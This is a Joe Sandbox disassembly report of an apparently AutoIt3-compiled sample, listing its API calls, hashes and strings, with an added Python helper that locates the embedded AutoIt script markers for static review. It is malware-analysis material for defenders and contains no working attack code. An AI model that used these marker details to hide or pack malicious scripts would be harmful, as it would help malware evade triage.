                                                        • Instruction Fuzzy Hash: B361EDB1A04219BAEB14DF64CC81FBE7BACEB08724F104119FA15D61E1DB74D981DBA0
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 0012DCDC
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0012DCEC
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0012DCF8
                                                        • __wsplitpath.LIBCMT ref: 0012DD56
                                                        • _wcscat.LIBCMT ref: 0012DD6E
                                                        • _wcscat.LIBCMT ref: 0012DD80
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0012DD95
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012DDA9
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012DDDB
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012DDFC
                                                        • _wcscpy.LIBCMT ref: 0012DE08
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0012DE47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                        • String ID: *.*
                                                        • API String ID: 3566783562-438819550
                                                        • Opcode ID: d542ddbbd8f372548a743fecb7db8b8e462a7bd0ef7c68db04b2b4e1c3a21752
                                                        • Instruction ID: 6ebeac9aa81a2a9535365fa2ae4653b5e71f6e72fbfba4b204bb0b52544f3802
                                                        • Opcode Fuzzy Hash: d542ddbbd8f372548a743fecb7db8b8e462a7bd0ef7c68db04b2b4e1c3a21752
                                                        • Instruction Fuzzy Hash: 69617A765042559FCB10EF60E844EAEB3E8FF89310F04892DF989D7262DB31E955CB92
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00129C7F
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00129CA0
                                                        • __swprintf.LIBCMT ref: 00129CF9
                                                        • __swprintf.LIBCMT ref: 00129D12
                                                        • _wprintf.LIBCMT ref: 00129DB9
                                                        • _wprintf.LIBCMT ref: 00129DD7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 311963372-3080491070
                                                        • Opcode ID: ad0a10ff05bcb55800c11f9b07b19bac523e3a8bdf75b424fd362561d3a038ae
                                                        • Instruction ID: 347fd93e77a5840e5945f028cf2b91ab10a76e244a77fb9845af3f0d6c128df9
                                                        • Opcode Fuzzy Hash: ad0a10ff05bcb55800c11f9b07b19bac523e3a8bdf75b424fd362561d3a038ae
                                                        • Instruction Fuzzy Hash: D951803194051AAACF14EBE4DD46EEEBB79EF14300F604069F509721A2EB312F99DF61
                                                        APIs
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • CharLowerBuffW.USER32(?,?), ref: 0012A3CB
                                                        • GetDriveTypeW.KERNEL32 ref: 0012A418
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0012A460
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0012A497
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0012A4C5
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: d7a51478c6bcb7d6e8ceea6b15a621c7d4491ea01f770be511f5c6866151f57f
                                                        • Instruction ID: 60816e9971425ee9b51e38d150d4093b3310c088df29a764f569634daa689147
                                                        • Opcode Fuzzy Hash: d7a51478c6bcb7d6e8ceea6b15a621c7d4491ea01f770be511f5c6866151f57f
                                                        • Instruction Fuzzy Hash: E1514B751042059FC700EF10C885EAEB3F4EF98718F44886DF88A57262DB71ED4ACB52
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,000FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0011F8DF
                                                        • LoadStringW.USER32(00000000,?,000FE029,00000001), ref: 0011F8E8
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • GetModuleHandleW.KERNEL32(00000000,00185310,?,00000FFF,?,?,000FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0011F90A
                                                        • LoadStringW.USER32(00000000,?,000FE029,00000001), ref: 0011F90D
                                                        • __swprintf.LIBCMT ref: 0011F95D
                                                        • __swprintf.LIBCMT ref: 0011F96E
                                                        • _wprintf.LIBCMT ref: 0011FA17
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0011FA2E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 984253442-2268648507
                                                        • Opcode ID: 990b13ebd28d2bcbd8626ee44236e06969162c81fa14ea1301022cb59304bfd3
                                                        • Instruction ID: 629f0db76d5e699a144216ef1a329346f0abd8dcb28e4fa128d8442cae3acf7a
                                                        • Opcode Fuzzy Hash: 990b13ebd28d2bcbd8626ee44236e06969162c81fa14ea1301022cb59304bfd3
                                                        • Instruction Fuzzy Hash: 4C412E7280411DAACB14FBE0DD86EEEB778AF58311F500069B509760A3EB356F4ACF61
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00149207,?,?), ref: 0014BA56
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BA6D
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BA78
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BA85
                                                        • GlobalLock.KERNEL32(00000000), ref: 0014BA8E
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BA9D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0014BAA6
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BAAD
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BABE
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00152CAC,?), ref: 0014BAD7
                                                        • GlobalFree.KERNEL32(00000000), ref: 0014BAE7
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0014BB0B
                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0014BB36
                                                        • DeleteObject.GDI32(00000000), ref: 0014BB5E
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0014BB74
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: 233f5706b5d6ee6db5d790e6a898e579a3751b6c2ad878c7eba37ec33675c9ee
                                                        • Instruction ID: 76501f9172157f424088535efd43589b19dc068258f1f1a64399dc922ba1dc25
                                                        • Opcode Fuzzy Hash: 233f5706b5d6ee6db5d790e6a898e579a3751b6c2ad878c7eba37ec33675c9ee
                                                        • Instruction Fuzzy Hash: 8D411879600208EFDB119F65DC88EABBBB9FB8AB11F104068F909D7270D7709D42DB60
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 0012DA10
                                                        • _wcscat.LIBCMT ref: 0012DA28
                                                        • _wcscat.LIBCMT ref: 0012DA3A
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0012DA4F
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012DA63
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0012DA7B
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0012DA95
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012DAA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                        • String ID: *.*
                                                        • API String ID: 34673085-438819550
                                                        • Opcode ID: ff042031ae890de2ac4a0cdd03b0058f5b75c930de618f2b6d56fd72d4dbe500
                                                        • Instruction ID: bbb7296c6bc1d9124e7f99185d56fcf4627071f6c57ed44c5a6d6d806668cb9f
                                                        • Opcode Fuzzy Hash: ff042031ae890de2ac4a0cdd03b0058f5b75c930de618f2b6d56fd72d4dbe500
                                                        • Instruction Fuzzy Hash: 6E81A1715083519FCB24DF64E845AAEB7E8BF89314F14882EF889C7251EB30DD95CB52
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0014C1FC
                                                        • GetFocus.USER32 ref: 0014C20C
                                                        • GetDlgCtrlID.USER32(00000000), ref: 0014C217
                                                        • _memset.LIBCMT ref: 0014C342
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0014C36D
                                                        • GetMenuItemCount.USER32(?), ref: 0014C38D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0014C3A0
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0014C3D4
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0014C41C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0014C454
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0014C489
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1296962147-4108050209
                                                        • Opcode ID: 2147d2928d64375198b1edc90886e3e573df04279fc33dadf26682bb452188d2
                                                        • Instruction ID: 5abf2dd39ee133f119fc37c66cf1aea6eebac5950545d04c4df4294f8006c1fa
                                                        • Opcode Fuzzy Hash: 2147d2928d64375198b1edc90886e3e573df04279fc33dadf26682bb452188d2
                                                        • Instruction Fuzzy Hash: 1F81BE7020A3019FD750CF14C994EBBBBE9FB88714F04492EFA95972A1D770D941CBA2
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0013738F
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0013739B
                                                        • CreateCompatibleDC.GDI32(?), ref: 001373A7
                                                        • SelectObject.GDI32(00000000,?), ref: 001373B4
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00137408
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00137444
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00137468
                                                        • SelectObject.GDI32(00000006,?), ref: 00137470
                                                        • DeleteObject.GDI32(?), ref: 00137479
                                                        • DeleteDC.GDI32(00000006), ref: 00137480
                                                        • ReleaseDC.USER32(00000000,?), ref: 0013748B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 24a2cfecb1c7b8b0c3524c42587db9183f4d464a65a1eeb5ca082e89b5b010d4
                                                        • Instruction ID: fae10940f6598943df7175aa8d9403f45cef45079ac0464c93a02d3e0237cc1a
                                                        • Opcode Fuzzy Hash: 24a2cfecb1c7b8b0c3524c42587db9183f4d464a65a1eeb5ca082e89b5b010d4
                                                        • Instruction Fuzzy Hash: 095139B5904209EFCB24CFA9CC85EAEBBB9FF49310F14842DF959A7361C771A9418B50
                                                        APIs
                                                          • Part of subcall function 000E0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000C6B0C,?,00008000), ref: 000E0973
                                                          • Part of subcall function 000C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C4743,?,?,000C37AE,?), ref: 000C4770
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000C6BAD
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000C6CFA
                                                          • Part of subcall function 000C586D: _wcscpy.LIBCMT ref: 000C58A5
                                                          • Part of subcall function 000E363D: _iswctype.LIBCMT ref: 000E3645
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 537147316-1018226102
                                                        • Opcode ID: 9d9b4fab77f4d723410c423b34899eee9980a8cedd492cfa31b70a7d03777fe7
                                                        • Instruction ID: f16bca147933fcfd41ec7d1ba286555b8b0016032eb94d10e6f5892258a18d5c
                                                        • Opcode Fuzzy Hash: 9d9b4fab77f4d723410c423b34899eee9980a8cedd492cfa31b70a7d03777fe7
                                                        • Instruction Fuzzy Hash: 1A029C301083449FC724EF24C881EAFBBE5EF95354F14492DF58A972A2DB31E989DB52
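                                                         The string table of this function (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06", the include-depth and directive-syntax errors) is the AutoIt3 runtime's script loader, and it is what the "Binary is likely a compiled AutoIt script file" signature keys on. The following is an added triage helper, not part of the Joe Sandbox report or of the analysed sample: it scans a file image for those markers and reports where the embedded script body starts, so the script can be carved for static review. The 16-byte body magic and the ASCII "AU3!EA06" layout are assumed from publicly documented AutoIt unpackers, not from this page; the test image is constructed.

```python
"""Locate the AutoIt3 compiled-script markers in a PE image (triage helper)."""
import re
from typing import Dict, List

# Strings the runtime's loader carries, as listed in the function above.
SCRIPT_MARKER = ">>>AUTOIT SCRIPT<<<"
VERSION_TAG = "AU3!EA06"          # "AU3!" + "EA06" from the same string table

# Assumption (not on this page): the 16-byte magic that precedes the version tag
# in the embedded script body, as documented by public AutoIt unpackers.
AU3_MAGIC = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")

MARKERS: Dict[str, bytes] = {
    "script_marker_ascii": SCRIPT_MARKER.encode("ascii"),
    "script_marker_utf16": SCRIPT_MARKER.encode("utf-16-le"),
    "au3_magic": AU3_MAGIC,
    "au3_version_tag": VERSION_TAG.encode("ascii"),
}


def find_autoit_markers(data: bytes) -> Dict[str, List[int]]:
    """Return {marker name: [offsets]} for every marker present in the image."""
    hits: Dict[str, List[int]] = {}
    for name, pattern in MARKERS.items():
        offsets = [m.start() for m in re.finditer(re.escape(pattern), data)]
        if offsets:
            hits[name] = offsets
    return hits


def script_body_offsets(data: bytes) -> List[int]:
    """Offsets just past each 'AU3!EA06' tag: where the packed script body starts."""
    tag = MARKERS["au3_version_tag"]
    return [off + len(tag) for off in find_autoit_markers(data).get("au3_version_tag", [])]


def looks_like_compiled_autoit(data: bytes) -> bool:
    """True only when the body header (magic immediately followed by the tag) is present.
    Seeing the loader strings alone means 'AutoIt runtime', not 'carries a script'."""
    hits = find_autoit_markers(data)
    magic_ends = {off + len(AU3_MAGIC) for off in hits.get("au3_magic", [])}
    return any(off in magic_ends for off in hits.get("au3_version_tag", []))


def build_sample_image() -> bytes:
    """Constructed test image, not the analysed sample: a fake DOS header, filler,
    the loader's UTF-16 marker, then a script body header laid out as AutoIt3 emits it."""
    prefix = b"MZ" + b"\x90" * 62                                  # 64 bytes
    filler = b"\xcc" * 32                                          # offsets 64..95
    marker = MARKERS["script_marker_utf16"]                        # 38 bytes at offset 96
    pad = b"\x00" * 8                                              # offsets 134..141
    body = AU3_MAGIC + MARKERS["au3_version_tag"] + b"\x00" * 16   # magic at 142, tag at 158
    return prefix + filler + marker + pad + body


def triage_file(path: str) -> Dict[str, List[int]]:
    """Scan a file on disk; the caller decides what to do with the offsets."""
    with open(path, "rb") as fh:
        return find_autoit_markers(fh.read())


if __name__ == "__main__":
    image = build_sample_image()
    print(find_autoit_markers(image))
    print("compiled AutoIt body present:", looks_like_compiled_autoit(image))
    print("script body starts at:", script_body_offsets(image))
```

                                                         Run it against the dumped image with `triage_file(path)`. The UTF-16 marker and the error strings will match any AutoIt3 runtime, including a benign one; the decision that a script is actually embedded rests on the magic-plus-tag pair, which is why `looks_like_compiled_autoit` requires them to be adjacent.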
                                                        APIs
                                                        • _memset.LIBCMT ref: 00122D50
                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00122DDD
                                                        • GetMenuItemCount.USER32(00185890), ref: 00122E66
                                                        • DeleteMenu.USER32(00185890,00000005,00000000,000000F5,?,?), ref: 00122EF6
                                                        • DeleteMenu.USER32(00185890,00000004,00000000), ref: 00122EFE
                                                        • DeleteMenu.USER32(00185890,00000006,00000000), ref: 00122F06
                                                        • DeleteMenu.USER32(00185890,00000003,00000000), ref: 00122F0E
                                                        • GetMenuItemCount.USER32(00185890), ref: 00122F16
                                                        • SetMenuItemInfoW.USER32(00185890,00000004,00000000,00000030), ref: 00122F4C
                                                        • GetCursorPos.USER32(?), ref: 00122F56
                                                        • SetForegroundWindow.USER32(00000000), ref: 00122F5F
                                                        • TrackPopupMenuEx.USER32(00185890,00000000,?,00000000,00000000,00000000), ref: 00122F72
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00122F7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 3993528054-0
                                                        • Opcode ID: c5adf12a7e291c6b16d00418bde1da5c0b37dd410fe1fa6ca922d9c839caf4f4
                                                        • Instruction ID: e4186c3691aaafaba02df5debfc305f1eb70a1605a092c486f5256e08c95ee5a
                                                        • Opcode Fuzzy Hash: c5adf12a7e291c6b16d00418bde1da5c0b37dd410fe1fa6ca922d9c839caf4f4
                                                        • Instruction Fuzzy Hash: 5071C270600229BEEB258F54EC45FAEBF65FF05324F24421AF625AA1E1C7B15C70DB91
                                                        APIs
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        • _memset.LIBCMT ref: 0011786B
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001178A0
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001178BC
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001178D8
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00117902
                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0011792A
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00117935
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0011793A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 1411258926-22481851
                                                        • Opcode ID: dc649a65ff872c7a2d84a5e206439c9c9f323cf1318f24ecf408b20962b86c95
                                                        • Instruction ID: 3e0d3968e16a4475cf33f3660c603e2ea1aa5575054062012fe3157477430edd
                                                        • Opcode Fuzzy Hash: dc649a65ff872c7a2d84a5e206439c9c9f323cf1318f24ecf408b20962b86c95
                                                        • Instruction Fuzzy Hash: 3641D57681422DAACB15EBA4DC85EEEB778FF54310F404069F905A72A2EB315E45CF90
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013FDAD,?,?), ref: 00140E31
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
